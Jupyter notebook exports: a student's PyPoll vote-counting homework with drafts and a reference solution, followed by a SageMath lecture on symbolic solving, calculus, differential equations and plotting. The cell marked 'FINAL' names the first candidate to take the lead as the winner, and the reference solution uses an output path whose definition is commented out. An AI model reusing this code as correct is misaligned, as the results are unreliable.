    txt_file.write(output) ###Output _____no_output_____ ###Markdown Draft 2 ###Code # Short List Test - DRAFT import os import csv filepath2 = os.path.join(".","election_data_test.csv") output_file = os.path.join(".", "votes_test2.txt") with open(filepath2, newline='') as csvfile2: csvreader2 = csv.reader(csvfile2, delimiter=',') header2 = next(csvreader2) #print(header2) votes = [] for candidate_name in csvreader2: votes.append(candidate_name[2]) #print(votes) votes_dict = {candidate:votes.count(candidate) for candidate in votes} ############################# # WRONG PLACEMENT # #output = (print(votes_dict)) otooley = "O'Tooley" print("Election Results") print(f"Total Votes: {len(votes)}") #print(votes_dict) print(f"Khan: {round((votes_dict['Khan']/len(votes))*100, 2)}% ({votes_dict['Khan']}) ") print(f"Correy: {round((votes_dict['Correy']/len(votes))*100, 2)}% ({votes_dict['Correy']}) ") print(f"Li: {round((votes_dict['Li']/len(votes))*100, 2)}% ({votes_dict['Li']}) ") print(f"O'Tooley: {round((votes_dict[otooley]/len(votes))*100, 2)}% ({votes_dict[otooley]})" ) ######################################################## maximum_vote = 0 winner_name = [] for key, value in votes_dict.items(): if value > maximum_vote: maximum_vote = value winner_name.append(key) #print(winner_name[0]) #print(maximum_vote) print(f"Winner: {winner_name[-1]}") # use the last appended key: it corresponds to the running maximum #with open(output_file, 'w') as txt_file: # txt_file.write(output) ###Output _____no_output_____ ###Markdown FINAL ###Code # JG's ANSWER!!! 
- FINAL FINAL FINFAL import os import csv #filepath2 = os.path.join(".","election_data.csv") filepath2 = os.path.join(".","election_data_test.csv") output_file = os.path.join(".", "pypoll_votes_final.txt") with open(filepath2, newline='') as csvfile2: csvreader2 = csv.reader(csvfile2, delimiter=',') header2 = next(csvreader2) #print(header2) votes = [] for candidate_name in csvreader2: votes.append(candidate_name[2]) #print(votes) votes_dict = {candidate:votes.count(candidate) for candidate in votes} print("Done running") #output = (print(votes_dict)) maximum_vote = 0 winner_name = [] for key, value in votes_dict.items(): if value > maximum_vote: maximum_vote = value winner_name.append(key) #print(winner_name[0]) #print(maximum_vote) #print(f"Winner: {winner_name[0]}") print(votes_dict) otooley = "O'Tooley" output = ( f"Election Results\n" f"Total Votes: {len(votes)}\n" f"Khan: {round((votes_dict['Khan']/len(votes))*100, 2)}% ({votes_dict['Khan']})\n" f"Correy: {round((votes_dict['Correy']/len(votes))*100, 2)}% ({votes_dict['Correy']})\n" f"Li: {round((votes_dict['Li']/len(votes))*100, 2)}% ({votes_dict['Li']})\n" f"O'Tooley: {round((votes_dict[otooley]/len(votes))*100, 2)}% ({votes_dict[otooley]})\n" f"Winner: {winner_name[0]}\n" ) with open(output_file, 'w') as txt_file: txt_file.write(output) print("Execution Completed") ###Output _____no_output_____ ###Markdown Answer 2: using 3 loops ###Code import os import csv filepath = os.path.join('.', "election_data_test.csv") with open(filepath, newline="") as csvfile3: csvreader3 = csv.reader(csvfile3, delimiter=',') # print to see each row #for row in csvreader3: #print(row) header3 = next(csvreader3) votes = [] # segregrate the votes into a seperate list for vote in csvreader3: votes.append(vote[2]) #print(votes) vote_dict2 = {} for candidate in votes: if candidate not in vote_dict2: vote_dict2[candidate] = 0 #vote_dict2[candidate] += 1 if candidate in vote_dict2: vote_dict2[candidate] += 1 print(vote_dict2) winner = ["", 0] for key, value in vote_dict2.items(): #print(key, value) if value > winner[1]: winner[1] = value winner[0] = key print(winner) 324 + 114 + 56 + 10 ###Output _____no_output_____ ###Markdown Play Cell for teaching ###Code # votes = [] # for candidate_name in csvreader2: # votes.append(candidate_name[2]) import os import csv #filepath2 = os.path.join(".","election_data.csv") filepath2 = os.path.join(".","election_data_test.csv") output_file = os.path.join(".", "pypoll_votes_final.txt") with open(filepath2, newline='') as csvfile2: csvreader2 = csv.reader(csvfile2, delimiter=',') header2 = next(csvreader2) #print(header2) votes2 = [candidate_name[2] for candidate_name in csvreader2] print(votes2) otooley = "O'Tooley" print(otooley) # Example pulled from Stackoverflow # votes = ['apple','red','apple','red','red','pear'] # d = {candidate:votes.count(candidate) for candidate in votes} # print(d) # -*- coding: UTF-8 -*- """PyPoll Homework Solution.""" # Incorporated the csv module import csv import os # Files to load and output (Remember to change these) file_to_load = os.path.join("election_data.csv") #file_to_output = os.path.join("analysis", "election_analysis.txt") # Total Vote Counter total_votes = 0 # Candidate Options and Vote Counters candidate_options = [] candidate_votes = {} # Winning Candidate and Winning Count Tracker winning_candidate = "" winning_count = 0 # Read the csv and convert it into a list of dictionaries with open(file_to_load) as election_data: reader = csv.reader(election_data) # Read the header header 
= next(reader) # For each row... for row in reader: # Run the loader animation #print(". ", end=""), # Add to the total vote count total_votes = total_votes + 1 # Extract the candidate name from each row candidate_name = row[2] # If the candidate does not match any existing candidate... # (In a way, our loop is "discovering" candidates as it goes) if candidate_name not in candidate_options: # Add it to the list of candidates in the running candidate_options.append(candidate_name) # And begin tracking that candidate's voter count candidate_votes[candidate_name] = 0 # Then add a vote to that candidate's count candidate_votes[candidate_name] = candidate_votes[candidate_name] + 1 # Print the results and export the data to our text file with open(file_to_output, "w") as txt_file: # Print the final vote count (to terminal) election_results = ( f"\n\nElection Results\n" f"-------------------------\n" f"Total Votes: {total_votes}\n" f"-------------------------\n") print(election_results, end="") # Save the final vote count to the text file txt_file.write(election_results) # Determine the winner by looping through the counts for candidate in candidate_votes: # Retrieve vote count and percentage votes = candidate_votes.get(candidate) vote_percentage = float(votes) / float(total_votes) * 100 # Determine winning vote count and candidate if (votes > winning_count): winning_count = votes winning_candidate = candidate # Print each candidate's voter count and percentage (to terminal) voter_output = f"{candidate}: {vote_percentage:.3f}% ({votes})\n" print(voter_output, end="") # Save each candidate's voter count and percentage to text file txt_file.write(voter_output) # Print the winning candidate (to terminal) winning_candidate_summary = ( f"-------------------------\n" f"Winner: {winning_candidate}\n" f"-------------------------\n") print(winning_candidate_summary) # Save the winning candidate's name to the text file txt_file.write(winning_candidate_summary) ###Output _____no_output_____
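###Markdown A compact alternative (a sketch, not part of the original homework): `collections.Counter` tallies the votes and finds the winner without hard-coding candidate names. It assumes the `votes` list built above is still in scope. ###Code from collections import Counter

tally = Counter(votes)                           # candidate -> vote count
winner_name, winner_votes = tally.most_common(1)[0]
for candidate, count in tally.items():
    print(f"{candidate}: {count/len(votes):.2%} ({count})")
print(f"Winner: {winner_name}")
###Output _____no_output_____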
src/Lecture6/notebook/.ipynb_checkpoints/8-SageCalculus-modified-checkpoint.ipynb
###Markdown Symbolic expressions**Reference:** [[1](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.html)]Last time we saw the basics of symbolic expressions:* How to define and manipulate symbolic expressions* How to introduce new variables (in the Mathematical sense) with `var()`* How to solve equations and inequalities* Some of the Mathematical constants that are included in Sage, and how to approximate them using `n()`Here are some examples to remind you of these basic things: ###Code var('y', 'z') # Define new variables (x is already defined by Sage) f = x^2 + pi g = y^2 + y - 2 > 0 print( solve(f==0, x) ) print( solve(z^2 - f, z) ) print( solve(g, y) ) print( 2*pi + e, "is approximately", n(2*pi + e) ) ###Output [ x == -sqrt(-pi), x == sqrt(-pi) ] [ z == -sqrt(pi + x^2), z == sqrt(pi + x^2) ] [[y < -2], [y > 1]] 2*pi + e is approximately 9.00146713563863 ###Markdown Now we will see some more details about solving equations and manipulating their solutions. Solving equations and inequalities**Reference** [[1](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.html)] for the details of `solve()` and `find_root()`, [[2](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/relation.htmlsolving)] for examples.Other than equations and inequalities, we can also solve systems: it is enough to give Sage a list of expressions and a list of variables with respect to which we want to solve. For example the system\begin{align*} \begin{cases} x + y = 2 \\ 2x - y = 6 \end{cases}\end{align*}Can be solved as ###Code solve([x+y == 2, 2*x - y == 6], [x,y]) ###Output _____no_output_____ ###Markdown **Exercise.** Find the intersection of the circle of radius $2$ centered in the origin and the parabula of equation $y=x^2-2x+1$. **Solution:** the system is\begin{align*} \begin{cases} y^2 = x^2 - 2x +1\\ x^2 + y^2 = 4 \end{cases}\end{align*} ###Code var('y') eq1 = y^2 == x^2-2*x+1 eq2 = x^2 + y^2 == 4 solve([eq1, eq2], [x,y]) ###Output _____no_output_____ ###Markdown The set of solutionsOne would expect the result of `solve()` to be a list of solutions, but it is actually a list of expressions (technically it is not a list but a different type of Python collection, but this is not so important) ###Code solutions = solve(x^2-9 == 0, x) solutions[0] # This is the expression 'x == -3' # Using rhs() explained below print(solutions[0].rhs()) ###Output -3 ###Markdown To read the actual solution without the `x ==` part you can use the `rhs()` or `lhs()` functions, which can be applied to any expression containing a relation operator (like `==`, `=`...) and return the *right hand side* and *left hand side* of the expression, respectively ###Code f = x^2+y <= 2-y print("rhs:", f.rhs()) print("lhs:", f.lhs()) ###Output rhs: -y + 2 lhs: x^2 + y ###Markdown When you solve an inequality or a system, the set of solutions can be more complicated to describe. In this case the result is a list containing lists of expressions that have to be `True` at the same time. 
It is easier to explain with an example: ###Code print("Simple inequality:", solve(x^2-9 > 0, x)) print("System of inequalities:\n", solve([x^2-9 > 0, x < 6], x)) ###Output Simple inequality: [[x < -3], [x > 3]] System of inequalities: [ [3 < x, x < 6], [x < -3] ] ###Markdown In the last example (system of inequalities), Sage is telling us that the system\begin{align*} \begin{cases} x^2-9 > 9 \\ x < 6 \end{cases}\end{align*}has two solutions:* $x$ is between $3$ and $6$;* $x$ is less than $-3$.Since in Sage (and in Python) expressions can have at most on relational operator like `<`, the first solution requires two expressions to be described. Hence the "list of lists". **Exercise.** In the first exercise you were asked to solve a system of equations, but some of its solutions were complex numbers. Select only the real solutions and print them as pairs $(x,y)$. ###Code # We use a different equation because the first exercise only # had real solutions. var('y') eq1 = y^2 == x^2-2*x+5 eq2 = x^2 + y^2 == 4 solutions = solve([eq1, eq2], [x,y]) print("All solutions:") print(solutions) for s in solutions: #print("One solutions is:", s) x0 = s[0].rhs() y0 = s[1].rhs() if x0 in RR and y0 in RR: print((x0, y0)) ###Output All solutions: [ [x == (-1/2*I + 1/2), y == -sqrt(1/2*I + 4)], [x == (-1/2*I + 1/2), y == sqrt(1/2*I + 4)], [x == (1/2*I + 1/2), y == -sqrt(-1/2*I + 4)], [x == (1/2*I + 1/2), y == sqrt(-1/2*I + 4)] ] ###Markdown When solving a system of equations (not inequalities), you can use the option `solution_dict=True` to have the solutions arranged as a *dictionary*, which is a type of Python collection that we did not treat in this course ###Code solve([x+y == 2, 2*x - y == 6], [x,y], solution_dict=True) ###Output _____no_output_____ ###Markdown Alternative method for real roots: `find_root()`The `solve()` method is very useful when solving *symbolic* equations, for example when you have two variables and you want to solve for one of them in terms of the other. However, it does not always find explicit solutions.When you want to find an explicit, even if approximate, solution, it can be better to use `find_root()`. This function works *numerically*, which means that it finds an approximation of the root. It only works for real solutions and you need to specify an interval where you want the root to be searched: ###Code f = e^x + x - 10 print("Using solve():\n", solve(f, x)) print("Using find_root():", f.find_root(0,10)) ###Output Using solve(): [ x == -e^x + 10 ] Using find_root(): 2.070579904980303 ###Markdown Evaluating functionsIf an expression contains only one variable you can evaluate it easily, even if it is not a function. ###Code var('y') f = x^2-3 g = x > x^2 print(f(2)) print(g(3+y)) ###Output 1 y + 3 > (y + 3)^2 ###Markdown If an expression contains more than one variable, you can specify a value for each of them and they will be substituted in alphabetic order. You can also specify a value only for some of the variables. ###Code var('y','z') f = y*z^2 - y == z print(f(2, 0)) print(f(z = 2)) ###Output -2 == 0 3*y == 2 ###Markdown Symbolic computationsSage can understand and simplify symbolic expressions such as sums (finite or infinite) and products. 
In the following cell, we compute the following sums using the [`sum()`](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.sum) function:\begin{align*} \begin{array}{llcc} (1) & \sum_{k=0}^nk &=&\frac{n^2+n}{2}\\ (2) & \sum_{k=0}^nk^4 &=&\frac{6n^5+15n^4+10n^3-n}{30}\\ (3) & \sum_{k=0}^n\binom nk &=& 2^n\\ (4) & \sum_{k=0}^\infty \frac1{k^2} &=& \frac{\pi^2}{6} \end{array}\end{align*}Recall that $\binom nk=\frac{n!}{k!(n-k)!}$ ###Code var('k', 'n') # Remember to declare all variables s = [] s.append( sum(k, k, 0, n) ) s.append( sum(k^4, k, 0, n) ) s.append( sum(binomial(n,k), k, 0, n) ) s.append( sum(1/k^2, k, 1, infinity) ) for i in range(len(s)): print("({}) {}".format(i+1, s[i])) ###Output (1) 1/2*n^2 + 1/2*n (2) 1/5*n^5 + 1/2*n^4 + 1/3*n^3 - 1/30*n (3) 2^n (4) 1/6*pi^2 ###Markdown An alternative notation is `expression.sum(k, a, b)`. There is an analogous [`prod()`](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.prod) for products. ###Code (x^2).prod(x, 1, n) ###Output _____no_output_____ ###Markdown Sometimes Sage tries to keep an expression in its original form without expanding out sums and products. To change this behavior you can use the [`expand()`](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.expand) function: ###Code f = (x+1)^2 - (x-1)^2 print(f) print(f.expand()) ###Output (x + 1)^2 - (x - 1)^2 4*x ###Markdown The Symbolic Ring**Reference:** [[3](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/ring.html)]The symbolic expressions that we have seen so far live in a ring called *symbolic ring* and denoted by `SR` in Sage. This ring works like the ring `ZZ` of integers or `RR` of reals numbers. In particular, you can define matrices and other objects using it as a "basis". ###Code var('a', 'b', 'c', 'd') M = matrix([[a,b], [c,d]]) print(M.determinant()) polring.<x> = SR[] f = x^2 + 2*a*x + a^2 print(f.roots()) ###Output -b*c + a*d [(-a, 2)] ###Markdown **Exercise.** Compute the eigenvalues of the matrix\begin{align*}\begin{pmatrix}\cos \alpha & \sin \alpha\\-\sin\alpha & \cos \alpha\end{pmatrix}\end{align*} ###Code var('a') M = matrix([[cos(a), sin(a)], [-sin(a), cos(a)]]) M.eigenvalues() lam = M.eigenvalues()[0] print(lam(pi/2)) ###Output -I ###Markdown Calculus**Reference:** [[4](https://doc.sagemath.org/html/en/reference/calculus/index.html)] for an overview, but most functions are described in [[1](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.html)] Limits and series**References:** [[5](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/calculus.htmlsage.calculus.calculus.limit)] for limits, [[6](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.series)] for seriesYou can compute limits ###Code var('x') f = sin(x)/x #print(f(0)) # This one gives an error print( f.limit(x=0) ) print( (e^(-x)).limit(x=-infinity) ) ###Output 1 +Infinity ###Markdown **Exercise.** Compute the constant $e$ using a limit. ###Code expression = (1+x/n)^n expression.limit(n=infinity) ###Output _____no_output_____ ###Markdown You can also specify a direction for the limit. If you don't, Sage assumes that you want to take a two-sided limit. 
###Code f = abs(x)/x # 1 if x>0, -1 if x<0 print( f.limit(x=0) ) # undefined print( f.limit(x=0, dir="+") ) print( f.limit(x=0, dir="-") ) plot(f) f = 1/x^2 print( f.limit(x=0) ) print( f.limit(x=0, dir="+") ) print( f.limit(x=0, dir="-") ) plot(f, (x, -10, 10), ymax = 10, ymin = -10) ###Output +Infinity +Infinity +Infinity ###Markdown There is also the alternative notation `limit(f, x, dir)` which does the same as `f.limit(x, dir)`. You can also compute series expansions up to any order. **Watch out:** the notation uses `==` instead of `=` as `limit()` does. ###Code f = e^x g = sin(x) - 2*cos(x) h = log(x) #print(f.series(x==0, 5)) #print(g.series(x==0, 7)) print(h.series(x==1, 4)) print((sin(x)^2*cos(x)).series(x==0, 6)) ###Output 1*(x - 1) + (-1/2)*(x - 1)^2 + 1/3*(x - 1)^3 + Order((x - 1)^4) 1*x^2 + (-5/6)*x^4 + Order(x^6) ###Markdown Derivatives**References:** [[7](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.derivative)] and [[8](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/functional.htmlsage.calculus.functional.derivative)] for derivatives, [[9](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/functions.htmlsage.calculus.functions.jacobian)] for the Jacobian matrix and [[10](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/expression.htmlsage.symbolic.expression.Expression.hessian)] for the Hessian. When computing derivatives, you need to specify with respect to which variables you want to derive, except in case there is only one. ###Code var('y') print( (x^2+2*y^4).derivative(y) ) # Alternative: derivative(f, y) print( (2*x^3-x+2).derivative() ) ###Output 8*y^3 6*x^2 - 1 ###Markdown You can also compute higher order derivatives: ###Code print( (x^3).derivative(x, x) ) # Same as (x^3).derivative(x, 2) f = x^7*y^2 + x^4*y^2 - 2*x^3 + x^2*y^5 + y + 2 print( f.derivative(x, x, y) ) # Twice in x, once in y print( f.derivative(x, 4, y, 2) ) # 4 times in x, twice in y ###Output 6*x 84*x^5*y + 10*y^4 + 24*x^2*y 1680*x^3 + 48 ###Markdown Jacobian and Hessian matrices are also easy to compute: ###Code f = (-x^2 + 2*x*y, y^3, x+y+x*y) print( jacobian(f, [x,y]), "\n" ) g = x^2 + x*y + y^3 -2*x*y^2 -3 print( g.hessian() ) ###Output [-2*x + 2*y 2*x] [ 0 3*y^2] [ y + 1 x + 1] [ 2 -4*y + 1] [ -4*y + 1 -4*x + 6*y] ###Markdown *Note:* the notation `f.jacobian([x,y])` is also valid, but only if you specify that `f` is vector by declaring it as `f = vector([...])`. Integrals**References:** [[11](https://doc.sagemath.org/html/en/reference/calculus/sage/symbolic/integration/integral.html)] for symbolic integration and [[12](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/integration.html)] for numerical methods.You should remember from high school or from your first calculus/analysis course that derivatives are easy, but integrals are hard.When using a computer software to solve your integrals, you have two choices:1. You can try to compute a primitive function exactly, and then (if you are computing a definite integral) substitute the endpoints of your integration interval to get the result. We can call this *symbolic integration*.2. You can get an *approximated* result with a *numerical method*. 
This method always gives some kind of result, but it cannot be used to compute indefinite integrals.Sage can do both of these things, although people that work in numerical analysis and use often the second method tend to prefer other programs, such as Matlab (or its open-source clone Octave). Symbolic integrationSymbolic integrals work more or less like derivatives. You must specify an integration variable, but the endpoints of the integration interval are optional. If they are not given you get an indefinite integral. ###Code var('a', 'b') f = x + sin(x) print( f.integral(x) ) # Alternative: integral(f, x) print( f.integral(x, -10, 10) ) print( f.integral(x, 0, pi) ) ###Output 1/2*x^2 - cos(x) 0 1/2*pi^2 + 2 ###Markdown Your endpoints can also be $\pm\infty$: ###Code print( integral(e^(-x), x, 0, infinity) ) print( integral(e^(-x^2), x, -infinity, infinity) ) ###Output 1 sqrt(pi) ###Markdown The last function is also an example of an integral that perhaps you might want to compute numerically. In fact: ###Code print( integral(e^(-x^2), x) ) print( integral(e^(-x^2), x, 1, 2) ) ###Output 1/2*sqrt(pi)*erf(x) 1/2*sqrt(pi)*erf(2) - 1/2*sqrt(pi)*erf(1) ###Markdown Here `erf(x)` denotes the [error function](https://en.wikipedia.org/wiki/Error_function). Numerical integrationIn order to get an explicit value for the computations above, we can use a *numerical* method.The word "numerical" does not have much to do with numbers, but it refers to the fact that we are trying to compute explicit results rather than symbolic or algebraic ones. [Numerical analysis](https://en.wikipedia.org/wiki/Numerical_analysis) is the branch of mathematics that studies methods to approximate computations over the real or complex numbers. With these methods there is usually a trade-off between speed and precision.The Sage function [`numerical_integral()`](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/integration.htmlsage.calculus.integration.numerical_integral) takes as a parameter a real-valued one-variable function and the integration endpoints, and it returns both an approximate value for the integral and an error estimate. ###Code numerical_integral(e^(-x^2), 1, 2) ###Output _____no_output_____ ###Markdown The result above means, in symbols\begin{align*}\int_1^2 e^{-x^2}\mathrm dx = 0.13525725794999466 \pm 1.5016572202374808\times 10^{-15}\end{align*}There is also a [`monte_carlo_integral()`](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/integration.htmlsage.calculus.integration.monte_carlo_integral) method for functions with more than one variable. **Exercise.** Compute the area of the ellipse of equation $y^2+\left(\frac x3\right)^2=1$. **Solution:** First, rewrite the equation as:\begin{align*}y = \sqrt{1- \left(\frac{x}{3}\right)^2}\end{align*} ###Code y = sqrt(1-(x/3)^2) show(plot(y, xmin=-3.1, xmax=3.1, ymin=-0.2, ymax=1.1)) integral(y, x, -3, 3) ###Output _____no_output_____ ###Markdown Differential equations**Reference:** [[13](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/desolvers.html)]A [differential equation](https://en.wikipedia.org/wiki/Differential_equation) is an equation involving an unknwon function and its derivatives. They can be of two kinds: *ordinary* differential equations ([ODE](https://en.wikipedia.org/wiki/Ordinary_differential_equation)) and *partial* differential equations ([PDE](https://en.wikipedia.org/wiki/Partial_differential_equation)). 
The latter involve multivariate functions and their partial derivatives.Differential equations are in general hard to solve *exactly* (or *symbolically*): even a simple equation of the form $f'(x)=g(x)$, where $g(x)$ is some known function, requires solving the integral $\int g(x)\mathrm{d}x$ in order to find $f$, which as we know is not always easy!Theoretical results on differential equations usually ensure the existence and/or uniqueness of a solution under certain conditions, but in general they do not give a way to solve them. There exist many methods to find approximate solutions, and some of them are implemented in Sage as well (see [[13](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/desolvers.html)]). However, we will focus on the simple ODEs that can be solved exactly.Let's start with a simple example. Let's find all functions $f(x)$ such that $f'(x)=f(x)$. In order to do so, we need to use the `function()` construct, which allows us to define an "unknown" function inside Sage, like we define variables with `var()`. ###Code var('x') function('f') equation = derivative(f(x)) == f(x) desolve(equation, f(x)) # f(x) is the unknown function ###Output _____no_output_____ ###Markdown As you might expect, they are all the functions $Ce^x$ for some constant $C$. The constant $C$ plays the same role as the constant in the solution of an integral, but in this case Sage writes it explicitly.We can also specify *initial conditions* for our function. For example, we can impose that $f(0)=3$ as follows: ###Code desolve(equation, f(x), (0,3)) ###Output _____no_output_____ ###Markdown You can also solve *second order* equations, that is equations where the second derivative also appears. In this case, if you want to specify an initial condition you should write the triple of values $(x_0, f(x_0), f'(x_0))$. ###Code equation = derivative(f(x), x, 2) + x*derivative(f(x)) == 1 desolve(equation, f(x), (0, 0, 0)) ###Output _____no_output_____ ###Markdown **Exercise.** Use Sage to find the functions $f(x)$ that satisfy\begin{align*} \begin{array}{rlcrl} (A) & \begin{cases} f(0) &= 1\\ f'(0) &= 0\\ f''(x) &= -f(x) \end{cases} & \qquad \qquad & (B) & \begin{cases} f(0) &= 0\\ f'(0) &= 1\\ f''(x) &= -f(x) \end{cases} \end{array}\end{align*} ###Code eq = derivative(f(x), x, 2) == -f(x) conditions1 = (0,1,0) conditions2 = (0,0,1) print( desolve(eq, f(x), conditions1) ) print( desolve(eq, f(x), conditions2) ) print( desolve(eq, f(x)) ) ###Output cos(x) sin(x) _K2*cos(x) + _K1*sin(x) ###Markdown A real-world exampleDifferential equations have countless applications in Science, so it would be a shame not to see at least a simple one.Consider an object moving with constant acceleration $a$. Its velocity at time $t$ is described by the formula $v(t) = v(0) + at$. For example, an object falling from the sky has acceleration $g\sim 9.8 m/s^2$ towards the ground, so its velocity is $v(t) = -gt$.However, in the real world you need to take into account the air's resistance, which depends (among other things) on the velocity of the object. In this case the acceleration $a(t)$ is not constant anymore, and it satisfies an equation of the form $a(t)=-g -kv(t)$, where $k$ is some constant that may depend on the shape and mass of the object (in practice it may be more complicated than this).Since the acceleration is the derivative of the velocity, we have a differential equation\begin{align*} v'(t) = -g -kv(t)\end{align*}and we can try to solve it with Sage! 
###Code var('t') function('v') g = 9.8 k = 1.5 conditions = (0, 0) # Start with velocity 0 sol = desolve(derivative(v(t)) == -g -k*v(t), v(t), conditions) #plot(sol, xmin=0, xmax = 100) ###Output _____no_output_____ ###Markdown If you want to solve this equation symbolically (that is, keeping $g$ and $k$ in symbols) you need to specify that $t$ is the *independent variable* of the equation: ###Code var('t', 'g', 'k') function('v') conditions = (0, 0) # Start with velocity 0 desolve(derivative(v(t)) == -g -k*v(t), v(t), conditions, ivar=t) ###Output _____no_output_____ ###Markdown Basic data analysis and visualization Statistics**References:** [[14](https://doc.sagemath.org/html/en/reference/stats/sage/stats/basic_stats.html)]Sage includes the most basic functions for statistical analysis. ###Code L = [1, 2, 3, 3, -6, -2, 4, -1, 0, 2, 3, -4, 0] print("Values:\t", L) print("Mean:\t\t\t", mean(L)) print("Median:\t\t\t", median(L)) print("Mode:\t\t\t", mode(L)) print("Standard deviation:\t", std(L)) print("Variance:\t\t", variance(L)) print("Moving average (5):", moving_average(L,5)) ###Output Values: [1, 2, 3, 3, -6, -2, 4, -1, 0, 2, 3, -4, 0] Mean: 5/13 Median: 1 Mode: [3] Standard deviation: 2*sqrt(29/13) Variance: 116/13 Moving average (5): [3/5, 0, 2/5, -2/5, -1, 3/5, 8/5, 0, 1/5] ###Markdown You can also compare your data to a probability distribution, see [this page](https://doc.sagemath.org/html/en/reference/probability/sage/probability/probability_distribution.html). If you need to do more advanced statistics you should consider using [R](https://www.r-project.org/); you can also use it inside Sage. Plotting**Reference:** [[15](https://doc.sagemath.org/html/en/reference/plotting/index.html)], more specifically the subsection [[16](https://doc.sagemath.org/html/en/reference/plotting/sage/plot/plot.html)].Some Sage objects can be plotted: ###Code f = sin(x) plot(f) ###Output _____no_output_____ ###Markdown Sage's plotting functions are based on Python's [matplotlib](https://matplotlib.org/).You can give a number of options to adjust the aspect of your plot, see [here](https://doc.sagemath.org/html/en/reference/plotting/sage/plot/plot.htmlsage.plot.plot.plot). Let's see some of them: ###Code f = sin(x) p = plot(f, -2*pi, 2*pi, # bounds for x ymin = -1.1, ymax = 1.1, # bounds for y color = "red", title = "The sin function", ) print("hello") show(p) ###Output hello ###Markdown Some of the options are not described precisely in Sage's documentation, but you can find them on [matplotlib's documentation](https://matplotlib.org/stable/contents.html). You can find many examples online for adjusting your plot as you like! If you need to plot more than one object at the time, you can sum two plots and show them together with `show()`: ###Code cosine = plot(cos(x), (x,-pi/2,pi/2), color="red") exponential = plot(exp(x), (x,-2,0.5)) show(cosine + exponential) # works like print() ###Output _____no_output_____ ###Markdown Finally, there are other types of plots that you can use, like [scatter plots](https://doc.sagemath.org/html/en/reference/plotting/sage/plot/scatter_plot.htmlsage.plot.scatter_plot.scatter_plot) and [bar charts](https://doc.sagemath.org/html/en/reference/plotting/sage/plot/bar_chart.htmlsage.plot.bar_chart.bar_chart). 
You can also add [text](https://doc.sagemath.org/html/en/reference/plotting/sage/plot/text.htmlsage.plot.text.text) to your plot: ###Code b = bar_chart(range(1,10)) s = scatter_plot([(1,5), (4,2), (8,8), (4,7)], marker = "*", # symbol markersize = 100, edgecolor = "green", facecolor = "red" ) t = text("wow, such plot!", (1, 8), color="black", fontsize=20) show(b + s + t) ###Output _____no_output_____ ###Markdown Interpolation**References:** [[17](https://doc.sagemath.org/html/en/reference/polynomial_rings/sage/rings/polynomial/polynomial_ring.htmlsage.rings.polynomial.polynomial_ring.PolynomialRing_field.lagrange_polynomial)] and [[18](https://doc.sagemath.org/html/en/reference/calculus/sage/calculus/interpolation.html)].When you need to work with a discrete set of data, like measurements of real-world quantities, it can be useful to visualize a "smoothed out" version of this data, for example by plotting a function that approximates it.One way to do so is finding the lowest-degree polynomial that passes through all your points. This is called [Lagrange Polynomial](https://en.wikipedia.org/wiki/Lagrange_polynomial). ###Code points = [ (0,1), (1,2), (1.5,0), (2,4), (3,5) ] polring.<x> = QQ[] # you need to specify a polynomial ring lp = polring.lagrange_polynomial(points) show(scatter_plot(points, facecolor="red") + plot(lp, 0, 3) # slightly different notation for polynomials + text(lp, (1,8), color="black") ) ###Output _____no_output_____ ###Markdown One can compute the Lagrange Polynomial over any base ring, and it has the advantage that it is a very "nice" function (continuous and differentiable as much as you like, with easily computable derivatives and primitives).However, it does not always give you good approximation of your data: ###Code R = [x/10 for x in range(-10,10)] L = [1/(1+25*x^2) for x in R] points = [(R[i], L[i]) for i in range(len(L))] polring.<x> = RR[] lp = polring.lagrange_polynomial(points) show(plot(lp, -0.92, 0.82) + scatter_plot(points)) ###Output _____no_output_____ ###Markdown This particular example is called [Runge's phenomenon](https://en.wikipedia.org/wiki/Runge%27s_phenomenon). For a better approximation you can use a [spline](https://en.wikipedia.org/wiki/Spline_(mathematics)), which is a *piecewise* polynomial function: ###Code show(plot(spline(points), -1, 1) + scatter_plot(points)) ###Output _____no_output_____
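###Markdown
To quantify how much better the spline behaves here, we can compare both approximations against the true Runge function on a fine sample grid. This is a quick sketch reusing `points` and `lp` from above; the 201-point sample grid in $[-0.9, 0.9]$ is an arbitrary choice for the comparison. ###Code
# Maximum pointwise error of the Lagrange polynomial vs. the spline,
# measured against the true function 1/(1+25*x^2) on a fine grid.
s = spline(points)
sample = [-0.9 + 1.8*i/200 for i in range(201)] # 201 evenly spaced points in [-0.9, 0.9]
err_lagrange = max(abs(lp(u) - 1/(1+25*u^2)) for u in sample)
err_spline = max(abs(s(u) - 1/(1+25*u^2)) for u in sample)
print("max error, Lagrange polynomial:", err_lagrange)
print("max error, spline:", err_spline)
###Output
_____no_output_____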
notebooks/object_following/01_live_demo.ipynb
